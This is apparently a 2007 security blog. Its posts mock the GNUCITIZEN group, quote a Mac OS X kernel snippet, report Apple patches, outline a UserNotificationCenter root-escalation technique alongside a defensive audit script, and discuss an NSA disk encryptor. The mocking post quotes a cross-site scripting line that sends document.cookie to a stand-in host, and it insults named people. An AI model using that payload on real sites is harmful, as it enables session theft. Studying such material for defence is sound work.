Thursday, September 27, 2007

That annoying GNUCITIZEN

It seems that there's a craze about applications being Javascript-enabled. It's a seriously insecure blackhole, dood! Between Bangbus spam on full-disclosure, Youtube pedophiles and other friendly inhabitants of the security community, we find Petko D. Petkov, also known as pdp, also known as GNUCITIZEN, web slayer and über underground hacker, known for the disclosure of repetitive web-related security advisories. Yack yack, the roof is on fire!

Not long ago, he came up with a pretty good timing for his new, re-designed and all-round 'bad boy looking' website, reborn as a (quoting literally):

GNUCITIZEN is a creative hacker organization. (...) So who is part of the group? The GNUCITIZEN group has some quite unique talents on board. We constantly expand our core team through a well thought screening process.

We thought at first that they were some sort of shady organization, right after reading the paragraph on screening. It was like, water-boarding training! How much water can you pull out of your lungs? Approved. Obviously this malign view went away after staring at the pictures for just a moment.

So, what's up with the GNUCITIZEN?
  1. It gets annoying to read his apocalyptic Engrish. There's not a single text from this young man that doesn't make you think something is seriously ticking inside someone else's head. It might be drugs, it might be some serious attention seeking disorder, or it might be BLACK PUBLIC RELATIONS (panic ensues at this point, take your shotgun).
  2. The overly repetitive pattern of the work: while they pretend to be an active group with a handful of different work areas, there's nothing but web security crap there. Not even the kind of issues that get your Wordpress blog credentials popped out. No, it's just a few different synonyms of Cross Site Scripting. Also known as the 'alert window denial of service' vulnerability class:
    1. alert('Oh gnoes, cookie:' + document.cookie);
    2. document.location('http://oh.gnoes.ru/cookie.php?' + document.cookie);
    3. Don't forget local network port scanning, DANGER WILL ROBINSON!
  3. The presence of a Public Relations consultant (whatever that means), who happens to be Petkov's polski-speaking chick!:

Ivana Kalay is a leading Public Relations security (PRS) expert. She specializes in competitive intelligence, social engineering and Black PR. Ivana is also an active member of GNUCITIZEN group and founder of Spin Hunters, the first PRS company in the United Kingdom.

Note that our friendly UK lobbyists have a law that basically makes all-things-hacking a bad thing! Maybe they will report themselves to Scotland Yard after reading this, and do us all a favor.

But please, stop the craze of nonsense security. Web security is important. Making a name for yourself just for fame and buzz is something nobody cares about. The so-called partial disclosure is just part of this madness. Security is simple: you either talk about it, or shut the f*ck up and keep it for yourself. Bragging is really retarded.

Wednesday, July 11, 2007

Nice granny code!

Too bad it only works for 'union' :>


/*
 * Delete a whiteout from the filesystem.
 */
/* ARGSUSED */
#warning XXX authorization not implmented for whiteouts
int
undelete(struct proc *p, register struct undelete_args *uap, __unused register_t *retval)
{

Left-overs from old functionality are dangerous. Or at least fun to deal with.

Tuesday, February 06, 2007

Mom, teh internets are down

Celebrating the 'Safe Internet Day'?

Friday, January 26, 2007

Apple releases Quicktime and Airport Extreme security updates

Apple has released security updates for the vulnerability published during the Month of Apple Bugs as MOAB-01-01-2007 and for the closing vulnerability of the Month of Kernel Bugs, MOKB-30-11-2006. The exposure time was 22 days for the first and 58 days for the latter (although no public proof of concept was distributed for it, which would most probably have sped up patch development).

Tuesday, January 23, 2007

Exploiting the otherwise non-exploitable, on Mac OS X

UserNotificationCenter retains wheel privileges at execution time, while still having the UID of the current user associated with it. Because of this, it will attempt to load any InputManager provided by the user, and the code within that input manager runs with wheel privileges. In combination with diskutil and a wheel-writable setuid binary, this allows unprivileged users to gain root privileges.

See the Month of Apple Bugs release and the exploit. This issue can be abused by fully unprivileged users and triggered via any of the so-called 'crashes' (e.g. alleged 'denial of service'-only issues...).
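As an added defensive check (not part of the original post or of the MOAB release), the shell functions below audit the two preconditions the post relies on: setuid binaries that their group or everyone can write to, and InputManager bundles installed under a Library directory. The ROOT and LIBRARY_DIR arguments are assumptions so the check can be pointed at any tree; the sample layout is constructed.

```sh
#!/bin/sh
# Added audit helper. Nothing here modifies the system; it only reports.

# find_writable_setuid ROOT
# Lists regular files under ROOT that carry the setuid bit (4000) and are
# writable by their group (020) or by everyone (002). A setuid binary that a
# non-root group such as wheel can rewrite lets any member of that group
# replace its contents and inherit the file owner's privileges.
find_writable_setuid() {
    root=${1:-/}
    find "$root" -xdev -type f \( -perm -4020 -o -perm -4002 \) 2>/dev/null
}

# list_input_managers LIBRARY_DIR
# Lists bundles under LIBRARY_DIR/InputManagers (on Mac OS X of that era the
# system path is /Library and the per-user one is ~/Library). The post's issue
# is that UserNotificationCenter loads such user-supplied bundles while it
# still holds wheel privileges, so anything listed here deserves a look.
list_input_managers() {
    dir="$1/InputManagers"
    [ -d "$dir" ] || return 0
    find "$dir" -mindepth 1 -maxdepth 1 -type d 2>/dev/null
}

# audit_privesc_preconditions ROOT LIBRARY_DIR
# Prints what each check found and returns 1 when either list is non-empty,
# so the function can gate a cron job or a configuration-management run.
audit_privesc_preconditions() {
    suid=$(find_writable_setuid "$1")
    ims=$(list_input_managers "$2")
    status=0
    if [ -n "$suid" ]; then
        printf 'group/world-writable setuid files:\n%s\n' "$suid"
        status=1
    fi
    if [ -n "$ims" ]; then
        printf 'InputManager bundles present:\n%s\n' "$ims"
        status=1
    fi
    return $status
}
```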

A tribute to the Month of Browser Bugs, and especially to Matt Miller, HD Moore and Skywing.

Sunday, January 07, 2007

Inline Media Encryptor

Description from the NSA website about IME:

The Inline Media Encryptor (IME) is a government-developed media encryption device. It is positioned "in line" between the computer processor and hard drive to ensure that anything stored to the hard drive gets encrypted and anything retrieved from the hard drive gets decrypted. The IME protects data classified Top Secret and below. Data stored on the hard drive is considered unclassified when encrypted.

Nice. Read about the features. Hardware-based solutions are certainly extremely useful. I wonder whether a commercial device conforming to similar standards is available for public consumption. Hopefully not.

Friday, January 05, 2007

January first week digest

There has been a significant workload, between working on exploit code and dealing with press and media. Looks like some stuff has been going around:

More to come if there's time for it.